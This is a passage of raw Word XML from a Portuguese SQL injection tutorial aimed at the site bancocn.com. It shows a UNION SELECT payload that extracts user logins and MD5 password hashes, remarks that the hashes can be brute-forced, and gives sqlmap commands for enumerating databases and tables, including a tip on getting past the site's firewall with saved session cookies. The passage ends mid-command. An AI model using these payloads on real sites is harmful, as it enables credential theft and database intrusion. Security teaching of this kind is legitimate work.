          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_name) from information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE table_name=”users”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09136BDB" w14:textId="77777777" w:rsidR="00F33580" w:rsidRDefault="00F33580" w:rsidP="003175F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F596B18" w14:textId="3125F4DD" w:rsidR="003175F5" w:rsidRDefault="003175F5" w:rsidP="003175F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003175F5">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Resultado da consulta: (Colunas d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>e users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F306E9" w14:textId="154C7CD9" w:rsidR="003175F5" w:rsidRDefault="003175F5" w:rsidP="003175F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325E3C37" wp14:editId="25AACC7B">
            <wp:extent cx="2190307" cy="350449"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="501080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806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7307" cy="35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EDC4" w14:textId="77777777" w:rsidR="005C2BF8" w:rsidRDefault="005C2BF8" w:rsidP="003175F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDD4374" w14:textId="77777777" w:rsidR="005C2BF8" w:rsidRPr="005E3FBF" w:rsidRDefault="005C2BF8" w:rsidP="005C2BF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Agora que temos: </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3FBF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nome da coluna, Nome da tabela, Nome do banco. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7A853" w14:textId="30335F56" w:rsidR="005C2BF8" w:rsidRDefault="005C2BF8" w:rsidP="005C2BF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Para fazer a query agora, ficou bem mais simples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808FBAC" w14:textId="77777777" w:rsidR="005E3FBF" w:rsidRDefault="005E3FBF" w:rsidP="005C2BF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B068069" w14:textId="4885955F" w:rsidR="005E3FBF" w:rsidRDefault="00000000" w:rsidP="005E3FBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="005E3FBF" w:rsidRPr="00625CDE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://bancocn.com/cat.php?id=41</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005E3FBF" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,group_concat(</w:t>
      </w:r>
      <w:r w:rsidR="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00120BDC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “:”</w:t>
      </w:r>
      <w:r w:rsidR="00120BDC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
      <w:r w:rsidR="00120BDC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “:”</w:t>
      </w:r>
      <w:r w:rsidR="00120BDC">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r w:rsidR="005E3FBF" w:rsidRPr="00625CDE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB4B83C" w14:textId="77777777" w:rsidR="006E7A3B" w:rsidRDefault="006E7A3B" w:rsidP="005E3FBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DA44F4" w14:textId="0ACE33B8" w:rsidR="006E7A3B" w:rsidRDefault="006E7A3B" w:rsidP="005E3FBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E7A3B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Resultado da consulta: (Credencias de acesso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631FC09F" w14:textId="14996FCC" w:rsidR="006E7A3B" w:rsidRPr="006E7A3B" w:rsidRDefault="006E7A3B" w:rsidP="005E3FBF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A senha está em Hash</w:t>
      </w:r>
      <w:r w:rsidR="00260214">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34537E94" w14:textId="7D6E2A86" w:rsidR="006E7A3B" w:rsidRDefault="006E7A3B" w:rsidP="006E7A3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A56E68" wp14:editId="7996E49E">
            <wp:extent cx="4657060" cy="345556"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="907307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76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03645" cy="35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3B0E" w14:textId="77777777" w:rsidR="0046644A" w:rsidRDefault="0046644A" w:rsidP="006E7A3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E32BA1" w14:textId="77777777" w:rsidR="0046644A" w:rsidRDefault="0046644A" w:rsidP="006E7A3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054FF1FE" w14:textId="29F4A29D" w:rsidR="006E7A3B" w:rsidRDefault="0046644A" w:rsidP="002910BC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B12218">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Geralmente nos bancos de d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>ados, as senhas dos usuários são salvos como HASHS, na qual não é possível descriptografar, mas através de força bruta, tentando várias strings você consegue chegar na string que corresponde a essa HASH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39903D0A" w14:textId="41028294" w:rsidR="000009A8" w:rsidRPr="0046644A" w:rsidRDefault="000009A8" w:rsidP="006006C4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F188F1E" w14:textId="23223589" w:rsidR="000009A8" w:rsidRPr="00503986" w:rsidRDefault="000009A8" w:rsidP="002910BC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A Ferramenta sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB4C8C" w14:textId="77777777" w:rsidR="000009A8" w:rsidRPr="00503986" w:rsidRDefault="000009A8" w:rsidP="000009A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489EB84B" w14:textId="77777777" w:rsidR="008A5B9D" w:rsidRDefault="00975E2B" w:rsidP="000009A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00975E2B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">É uma ferramenta que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">você consegue automatizar o processo de SQL Injection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B32608" w14:textId="56B3BE77" w:rsidR="000009A8" w:rsidRDefault="00975E2B" w:rsidP="000009A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Segue um exemplo de uso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534CD4F9" w14:textId="3AF9648F" w:rsidR="00975E2B" w:rsidRDefault="00975E2B" w:rsidP="00975E2B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125CCDA2" w14:textId="02515988" w:rsidR="00975E2B" w:rsidRDefault="00975E2B" w:rsidP="00975E2B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>“http://www.bancocn.com/cat.php?id=1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722D815" w14:textId="77777777" w:rsidR="00F63671" w:rsidRPr="00DD7497" w:rsidRDefault="00F63671" w:rsidP="00975E2B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110B8E94" w14:textId="0369779F" w:rsidR="00A17875" w:rsidRDefault="00DD7497" w:rsidP="00A17875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD7497">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F63671">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de utiliza-lo, você deve passar os cookies de sessão para ele, </w:t>
      </w:r>
      <w:r w:rsidR="00836177">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">somente desse jeito, </w:t>
      </w:r>
      <w:r w:rsidR="00163764">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">se não passar, </w:t>
      </w:r>
      <w:r w:rsidR="00836177">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">o firewall por trás da aplicação irá bloquear. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99BAAC" w14:textId="08C2D392" w:rsidR="00836177" w:rsidRDefault="00836177" w:rsidP="00F63671">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Primeiro, você deve </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2032">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>criar um arquivo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> com </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2032">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o Request Header (Requisição)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> e realizar o comando abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610B1F8F" w14:textId="77777777" w:rsidR="00836177" w:rsidRDefault="00836177" w:rsidP="00F63671">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19988D16" w14:textId="2A9EFC65" w:rsidR="00836177" w:rsidRDefault="00836177" w:rsidP="00836177">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r </w:t>
      </w:r>
      <w:r w:rsidRPr="00836177">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>./Documents/requestHeader.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8FEA2" w14:textId="77777777" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00836177">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A81633" w14:textId="1851056F" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Resposta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9E3BF" w14:textId="77777777" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7742E427" w14:textId="5EF640FB" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2827D60B" wp14:editId="73533100">
            <wp:extent cx="6105965" cy="4293705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1479090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905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11836" cy="42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E028" w14:textId="77777777" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66468029" w14:textId="4290528E" w:rsidR="00163764" w:rsidRDefault="00163764" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Ele consegue encontrar 2 tipos de vulnerabilidades.</w:t>
      </w:r>
      <w:r w:rsidR="0046644A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB537A7" w14:textId="77777777" w:rsidR="0046644A" w:rsidRDefault="0046644A" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE99FB8" w14:textId="77777777" w:rsidR="0046644A" w:rsidRDefault="0046644A" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF57322" w14:textId="77777777" w:rsidR="00A17875" w:rsidRDefault="00A17875" w:rsidP="00163764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F44B090" w14:textId="77777777" w:rsidR="00BC251B" w:rsidRDefault="00BC251B" w:rsidP="00A17875">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B57980F" w14:textId="465FAB8A" w:rsidR="00BC251B" w:rsidRDefault="00BC251B" w:rsidP="00DB3862">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para listar todos os bancos de dados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD6D61" w14:textId="59418A7B" w:rsidR="00BC251B" w:rsidRDefault="00BC251B" w:rsidP="00BC251B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Documents/requestHeader.txt </w:t>
      </w:r>
      <w:r w:rsidR="00A17875">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC251B">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785AEE20" w14:textId="77777777" w:rsidR="00DB3862" w:rsidRDefault="00DB3862" w:rsidP="00BC251B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5411D91A" w14:textId="19666FEE" w:rsidR="00DB3862" w:rsidRDefault="00DB3862" w:rsidP="00DB3862">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Para listar </w:t>
      </w:r>
      <w:r w:rsidR="001F11B2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">todas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>as tabelas de um banco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A9ED3" w14:textId="10034C98" w:rsidR="00DB3862" w:rsidRDefault="00DB3862" w:rsidP="00DB3862">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Documents/requestHeader.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–D </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">bancocn </w:t>
      </w:r>
      <w:r w:rsidR="00A17875">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
